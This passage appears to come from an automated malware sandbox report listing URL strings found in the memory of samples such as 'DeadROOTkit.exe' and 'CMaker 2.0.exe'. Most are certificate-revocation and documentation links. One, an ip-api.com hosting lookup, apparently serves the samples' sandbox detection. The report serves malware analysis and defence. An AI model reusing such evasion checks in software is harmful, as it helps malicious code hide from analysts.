2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227665818.0000022D3531F000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225705918.0000022D35166000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2218109441.0000022D35166000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: CMaker 2.0.exe, 00000005.00000003.2226075611.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244441586.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227028910.0000022D352A1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259027961.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228541263.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228098840.0000022D35221000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227028910.0000022D352A1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl4-
                        Source: CMaker 2.0.exe, 00000005.00000002.2259602397.0000022D35306000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.d-
                        Source: CMaker 2.0.exe, 00000005.00000003.2226979229.0000022D3531E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226605077.0000022D352B9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2225418813.0000022D35112000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229249581.0000022D35113000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2235901108.0000022D35114000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                        Source: CMaker 2.0.exe, 00000005.00000003.2225705918.0000022D35166000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2218109441.0000022D35166000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                        Source: CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226910448.0000022D352A9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227278021.0000022D352AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlH
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C018D000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C018B000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472203869.000002D6F066E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323371929.000002D6F066E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                        Source: CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                        Source: lsass.exe, 00000014.00000000.2324334654.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3476204379.000002D6F0C43000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2631789089.000002D6F0C48000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                        Source: lsass.exe, 00000014.00000002.3484275684.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2327539653.000002D6F0DBD000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153367704.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154831526.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154539610.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153633513.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158096042.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154348127.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158194630.00000218C0180000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                        Source: lsass.exe, 00000014.00000003.2631692516.000002D6F0D72000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2641944751.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0D9A000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3482576500.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3480257222.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000003.2632123712.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2325649964.000002D6F0CEB000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2326172160.000002D6F0DA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0~
                        Source: lsass.exe, 00000014.00000002.3472734902.000002D6F0688000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2323428537.000002D6F0688000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: lsass.exe, 00000014.00000002.3476204379.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000000.2324334654.000002D6F0C00000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34CFC000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259985977.0000022D35440000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
                        Source: lsass.exe, 00000014.00000000.2323129454.000002D6F064E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471566712.000002D6F064E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
                        Source: lsass.exe, 00000014.00000000.2323081160.000002D6F062F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000014.00000002.3471000801.000002D6F062F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                        Source: CMaker 2.0.exe, 00000005.00000003.2234513191.0000022D34AA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232148885.0000022D34A94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                        Source: CMaker 2.0.exe, 00000005.00000003.2236584735.0000022D350B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                        Source: CMaker 2.0.exe, 00000005.00000003.2231869727.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2241810301.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2248531599.0000022D34DB5000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2222507577.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2177316292.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2176753865.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2175839153.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232649259.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2229086639.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2240132556.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232613398.0000022D34DBE000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2233299609.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2232547754.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2226687778.0000022D34DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                        Source: DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030F4000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030E8000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.00000000030DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                        Source: 1.exe, 00000004.00000002.2208653873.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000002.2316235027.000000000305A000.00000004.00000800.00020000.00000000.sdmp, DeadROOTkit.exe, 00000007.00000000.2203959868.0000000000DD2000.00000002.00000001.01000000.0000001B.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                        Source: powershell.exe, 00000009.00000002.2359290982.000001DE7469F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2359290982.000001DE74842000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: CMaker 2.0.exe, 00000005.00000003.2229209676.0000022D34CA0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2238078413.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2234701009.0000022D34CD0000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2230284618.0000022D34CA1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2244950158.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2257114555.0000022D34CD1000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2228810788.0000022D34C9B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                        Source: CMaker 2.0.exe, 00000005.00000003.2226376831.0000022D352E3000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2220128984.0000022D35221000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225808722.0000022D352C9000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000002.2259547201.0000022D352E6000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2225314134.0000022D35274000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000005.00000003.2227398633.0000022D352E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                        Source: CMaker 2.0.exe, 00000002.00000003.2159236545.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158330808.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2154111346.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153941458.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2153763933.00000218C017E000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2157716740.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2160330876.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 00000002.00000003.2158524177.00000218C0180000.00000004.00000020.00020000.00000000.sdmp, CMaker 2.0.exe, 